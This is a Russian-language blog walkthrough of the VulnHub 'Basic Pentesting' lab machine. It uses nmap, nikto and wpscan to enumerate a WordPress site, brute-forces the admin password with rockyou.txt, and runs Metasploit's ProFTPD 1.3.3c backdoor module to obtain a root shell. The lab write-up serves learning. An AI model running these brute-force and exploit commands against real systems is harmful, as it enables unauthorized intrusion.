Ломаем виртуальную машину с VulnHub. Basic Pentesting.

Будем проходить очередную машину от VulnHub. Как пишет автор это Basic машина для новичков, ну прям для меня. Наша задача получить привилегии root, так же есть несколько векторов атак. Качаем машину.


Разведка…


Все начинается с простого, определяем IP сервера, сканируем порты:


arp-scan -l

nmap 192.168.56.105 -p - -sV

Стандартный набор : FTP 21 порт, SSH 22 порт и HTML 80 порт. Заходим на веб-сервер там тоже все скромно и не интересно.



Не расстраиваемся , посмотрим что можно еще найти на веб-сервер. Сегодня попробуем новую пакет nikto . Nikto это Open Source (GPL) веб-сканер. Избавляет от рутинной ручной работы. Ищет на целевом сайте неудаленные скрипты (какие-нибудь test.php, index_.php и т.п.), инструменты администрирования бд (/phpmyadmin/, /pma и подобные) и т.д. Если не знакомы , пора познакомиться.


nikto -h 192.168.56.105


Как и ожидалось нашелся секрет. Заходим на 192.168.56.105/secret и видим блог на WordPress, если не ошибаюсь это тема из коробки )



Если у вас открывается криво , то надо в файл hosts добавить IP машины для домена vtcsec. WordPress очень популярный система управления контентом, значит мы можем надеяться и на уязвимости. Запускаем WPscan.


wpscan --url http://192.168.56.105/secret/

Тут у нас целая роспись уязвимостей пользуйтесь как говориться:



Так же у нас есть пользователь admin, давайте попробуем подобрать пароль:


wpscan  --url http://192.168.56.105/secret/ --passwords /use/share/wordlists/rockyou.txt --usernames 'admin'



FTP-сервер.


С WordPress мы разобрались, переходим к ftp-серверу(ProFTP 1.3.3c ) Если погуглить, то сразу понятно он дырявый. Для организации атаки будем использовать Metasploit.


Metasploit является одной из популярнейших программ, имеющих самую большую базу эксплойтов, шеллкодов и кучу разнообразной документации, что не может не обрадовать.


# Будем использовать консольный вариант.
msfconsole

# Ищем эксплоит на proftp 1.3.3
msf5> search proftp 1.3.3


#Выбираем эксплоит
msf5> use exploit/unix/ftp/proftpd_133c_backdoor

#Делаем настройки
msf5> set rhost 192.168.56.105
msf5 > set lhost 192.168.56.103

#Запускаем 
msf5 > run


Вот собственно и root-shell . Очень хорошая машина для новичка, можно потестить разные уязвимости и способы взлома. Успехов.


Все инструменты из статьи установлены в дистрибутиве Kali Linux.


Добавить комментарий

Автору будет очень приятно получить обратную связь.

Комментариев 0